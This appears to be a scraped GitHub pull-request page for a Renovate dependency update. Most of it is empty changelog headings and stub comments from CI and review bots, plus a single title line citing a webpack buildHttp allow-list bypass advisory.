Fixes

Fixes

Features

Fixes

Performance Improvements

Fixes

Fixes

Fixes

Fixes

Features

Performance Improvements

Fixes

Performance Improvements

Fixes

Fixes

Features

Performance Improvements

Fixes

Fixes

Fixes

Fixes

Fixes

Fixes

Fixes

Fixes

Fixes

Fixes

Features

Performance Improvements

Chores

Fixes

Performance Improvements

Chores

Features

Continuous Integration

New Contributors

Configuration

Uh oh!

coderabbitai Bot commented Feb 8, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Review skipped

Uh oh!

nx-cloud Bot commented Feb 8, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

renovate Bot commented Feb 8, 2026 •

edited

Loading

webpack buildHttp: allowedUris allow-list bypass via URL userinfo (@) leading to build-time SSRF behavior

coderabbitai Bot commented Feb 8, 2026 •

edited

Loading

nx-cloud Bot commented Feb 8, 2026 •

edited

Loading

github-actions Bot commented Apr 16, 2026 •

edited

Loading

nx-cloud Bot left a comment •

edited

Loading

nx-cloud Bot left a comment •

edited

Loading

nx-cloud Bot left a comment •

edited

Loading

nx-cloud Bot left a comment •

edited

Loading

nx-cloud Bot left a comment •

edited

Loading

nx-cloud Bot left a comment •

edited

Loading